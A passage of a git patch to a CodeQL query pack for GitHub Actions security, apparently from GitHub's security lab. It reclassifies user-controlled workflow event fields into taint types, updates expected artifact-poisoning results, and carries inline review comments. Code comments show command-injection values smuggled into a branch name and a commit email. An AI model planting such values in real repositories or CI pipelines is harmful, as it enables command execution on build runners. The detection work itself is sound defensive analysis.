"*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | Run Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | Run Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | From 00f6ff8c0155c064c5e1733aaf3cc4710755185d Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 27 Apr 2024 11:02:33 +0200 Subject: [PATCH 0225/1267] Split sources by taint type --- .../codeql/actions/dataflow/FlowSources.qll | 250 +++++--- .../actions/security/EnvVarInjectionQuery.qll | 8 - ...ahmadnassri_action-changed-files.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- ...ecloudplatform_dataflowtemplates.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 14 +- ...han_pull-request-comment-trigger.model.yml | 4 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +- ql/lib/ext/tj-actions_changed-files.model.yml | 34 +- .../tj-actions_verify-changed-files.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 8 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 4 +- ql/src/Security/CWE-077/EnvPathInjection.ql | 6 + ql/src/Security/CWE-077/EnvVarInjection.ql | 9 +- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 + .../CWE-077/PrivilegedEnvVarInjection.ql | 9 +- ql/test/library-tests/test.actual | 598 ------------------ ql/test/library-tests/test.expected | 136 ++-- .../CWE-077/.github/workflows/test1.yml | 2 + .../CWE-077/.github/workflows/test4.yml | 4 + .../Security/CWE-077/EnvVarInjection.expected | 3 + .../PrivilegedEnvPathInjection.expected | 1 - .../PrivilegedEnvVarInjection.expected | 3 + 31 files changed, 336 insertions(+), 797 deletions(-) delete mode 100644 ql/test/library-tests/test.actual diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0dc376765a8..754d28cb93e 100644 
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,5 +1,3 @@ -private import actions -private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery 
@@ -22,53 +20,17 @@ abstract class RemoteFlowSource extends SourceNode { } bindingset[context] -private predicate isExternalUserControlled(string context) { - exists(string reg | reg = "github\\.event" | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} - -bindingset[context] -private predicate isExternalUserControlledIssue(string context) { - exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} - -bindingset[context] -private predicate isExternalUserControlledPullRequest(string context) { - exists(string reg | - reg = - [ - "github\\.event\\.pull_request\\.title", "github\\.event\\.pull_request\\.body", - "github\\.event\\.pull_request\\.head\\.label", - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.repo\\.description", - "github\\.event\\.pull_request\\.head\\.repo\\.homepage", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref" - ] - | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} - -bindingset[context] -private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.review\\.body")) -} - -bindingset[context] -private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.comment\\.body")) -} - -bindingset[context] -private predicate isExternalUserControlledGollum(string context) { +private predicate titleEvent(string context) { exists(string reg | reg = [ + // title + "github\\.event\\.issue\\.title", // issue + "github\\.event\\.pull_request\\.title", // pull request + "github\\.event\\.discussion\\.title", // discussion "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title" + 
"github\\.event\\.pages\\[[0-9]+\\]\\.title", + "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -76,19 +38,12 @@ private predicate isExternalUserControlledGollum(string context) { } bindingset[context] -private predicate isExternalUserControlledCommit(string context) { +private predicate urlEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.commits\\[[0-9]+\\]\\.message", "github\\.event\\.head_commit\\.message", - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + // url + "github\\.event\\.pull_request\\.head\\.repo\\.homepage", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
@@ -96,32 +51,71 @@ private predicate isExternalUserControlledCommit(string context) { } bindingset[context] -private predicate isExternalUserControlledDiscussion(string context) { +private predicate textEvent(string context) { exists(string reg | - reg = ["github\\.event\\.discussion\\.title", "github\\.event\\.discussion\\.body"] + reg = + [ + // text + "github\\.event\\.issue\\.body", // body + "github\\.event\\.pull_request\\.body", // body + "github\\.event\\.discussion\\.body", // body + "github\\.event\\.review\\.body", // body + "github\\.event\\.comment\\.body", // body + "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage + "github\\.event\\.head_commit\\.message", // message + "github\\.event\\.workflow_run\\.head_commit\\.message", // message + "github\\.event\\.pull_request\\.head\\.repo\\.description", // description + "github\\.event\\.workflow_run\\.head_repository\\.description", // description + "github\\.event\\.client_payload\\[[0-9]+\\]", // payload + "github\\.event\\.client_payload", // payload + "github\\.event\\.inputs\\[[0-9]+\\]", // input + "github\\.event\\.inputs", // input + ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledWorkflowRun(string context) { +private predicate repoNameEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.display_title", + // repo name + // Owner: All characters must be either a hyphen (-) or alphanumeric + // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name + "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name + "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo + ] + | + 
Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +bindingset[context] +private predicate branchEvent(string context) { + exists(string reg | + reg = + [ + // branch + // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names + // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. + // - They must contain at least one / + // - They cannot have two consecutive dots .. anywhere. + // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. + // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. + // - They cannot begin or end with a slash / or contain multiple consecutive slashes + // - They cannot end with a dot . + // - They cannot contain a sequence @{ + // - They cannot be the single character @ + // - They cannot contain a \ + // eg: zzz";echo${IFS}"hello";# would be a valid branch name + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", + "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_repository\\.description", - "github\\.event\\.workflow_run\\.head_repository\\.full_name", - "github\\.event\\.workflow_run\\.head_repository\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.message", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - 
"github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
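Review bot: The refname rules pasted above the `branchEvent` list include "They must contain at least one /", which as far as I know applies to full refs such as `refs/heads/x`, not to the short branch names these contexts carry; the example branch name on the last comment line has no slash either. I would drop that bullet so the comment does not suggest that a slash-free value cannot reach a sink. The list also names `"github\\.event\\.workflow_run\\.head_branch"` twice in a row, and one entry is enough. In `textEvent`, `// messsage` should read `// message`.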
@@ -129,45 +123,117 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } bindingset[context] -private predicate isExternalUserControlledRepositoryDispatch(string context) { +private predicate labelEvent(string context) { exists(string reg | - reg = ["github\\.event\\.client_payload\\[[0-9]+\\]", "github\\.event\\.client_payload",] + reg = + [ + // label + // - They cannot contain a escaping \ + "github\\.event\\.pull_request\\.head\\.label", + ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledWorkflowDispatch(string context) { - exists(string reg | reg = ["github\\.event\\.inputs\\[[0-9]+\\]", "github\\.event\\.inputs",] | +private predicate emailEvent(string context) { + exists(string reg | + reg = + [ + // email + // `echo${IFS}hello`@domain.com + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + ] + | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } -private class EventSource extends RemoteFlowSource { +bindingset[context] +private predicate usernameEvent(string context) { + exists(string reg | + reg = + [ + // username + // All characters must be either a hyphen (-) or alphanumeric + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + 
+bindingset[context] +private predicate pathEvent(string context) { + exists(string reg | + reg = + [ + // filename + "github\\.event\\.workflow\\.path", + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +bindingset[context] +private predicate jsonEvent(string context) { + exists(string reg | + reg = + [ + // json + "github\\.event", + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +class EventSource extends RemoteFlowSource { + string flag; + EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlled(context) or - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) or - isExternalUserControlledRepositoryDispatch(context) or - isExternalUserControlledWorkflowDispatch(context) + titleEvent(context) and flag = "title" + or + urlEvent(context) and flag = "url" + or + textEvent(context) and flag = "text" + or + repoNameEvent(context) and flag = "repo name" + or + branchEvent(context) and flag = "branch" + or + labelEvent(context) and flag = "label" + or + emailEvent(context) and flag = "email" + or + usernameEvent(context) and flag = "username" + or + pathEvent(context) and flag = "filename" + or + jsonEvent(context) and flag = "json" ) } - override string getSourceType() { result = "User-controlled events" } + override string getSourceType() { result = flag } } /** * A Source of untrusted data defined in a MaD specification */ -private class ExternallyDefinedSource extends RemoteFlowSource { +class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; ExternallyDefinedSource() { 
externallyDefinedSource(this, sourceType, _) } @@ -178,19 +244,19 @@ private class ExternallyDefinedSource extends RemoteFlowSource { /** * An input for a Composite Action */ -private class CompositeActionInputSource extends RemoteFlowSource { +class CompositeActionInputSource extends RemoteFlowSource { CompositeAction c; CompositeActionInputSource() { c.getAnInput() = this.asExpr() } - override string getSourceType() { result = "Composite action input" } + override string getSourceType() { result = "input" } } /** * A downloadeded artifact. */ -private class ArtifactToOptionSource extends RemoteFlowSource { - ArtifactToOptionSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } +private class ArtifactSource extends RemoteFlowSource { + ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } - override string getSourceType() { result = "Step output from Artifact" } + override string getSourceType() { result = "artifact" } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index cdcc1dbdf81..6e6e768bdf7 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -7,14 +7,6 @@ import codeql.actions.DataFlow abstract class EnvVarInjectionSink extends DataFlow::Node { } -// predicate envVarInjectionFromEnvVarSink(DataFlow::Node sink) { -// exists(Expression expr, Run run, string varName, string key, string value | -// expr = run.getInScopeEnvVarExpr(varName) and -// Utils::writeToGitHubEnv(run, key, value) and -// expr = sink.asExpr() and -// value.matches("%$" + ["", "{", "ENV{"] + varName + "%") -// ) -// } class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, Expression expr, string varname, string key, string value | 
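Review bot: The comment in `usernameEvent` says "All characters must be either a hyphen (-) or alphanumeric", but every pattern in the list is a commit `author.name` or `committer.name`. As far as I know that is the free-form name recorded in the git commit, not a GitHub login, so the character restriction does not hold. If any query uses the `"username"` source type to lower severity or skip results, these fields would be under-reported; I would either tag them `"text"` or reword the comment to `// git author/committer name: free-form, set by whoever creates the commit`. Separately, `EventSource` is now public but has no QLDoc, and its field is named `flag` while `ExternallyDefinedSource` uses `sourceType` for the same value; `string sourceType;` would match.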
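Review bot: `ArtifactSource` keeps its `private` modifier while `ExternallyDefinedSource` and `CompositeActionInputSource` in this hunk (and `EventSource` in the previous one) lose it, so a query cannot refer to artifact sources by class as it now can for the others; if that is deliberate, a one-line QLDoc saying so would help. `CompositeActionInputSource` now reports `"input"`, whereas `github.event.inputs` contexts are reported as `"text"` by `textEvent`, which is easy to confuse when filtering on `getSourceType()`. A comment listing the allowed source-type strings in one place would make the vocabulary explicit. The context QLDoc `A downloadeded artifact.` has a typo and should read `A downloaded artifact.`.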
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 63e99abd4d3..fe3c3e58b5f 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files", "manual"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index f2b8c8549a9..4d12a293696 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title", "manual"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index 21688675a2e..a4539923b35 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch", "manual"] + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index f90eaeb7271..472778d33b4 100644 
--- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details", "manual"] + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 14743f2819e..79621a6a30c 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "PR changed files", "manual"] + - ["dorny/paths-filter", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 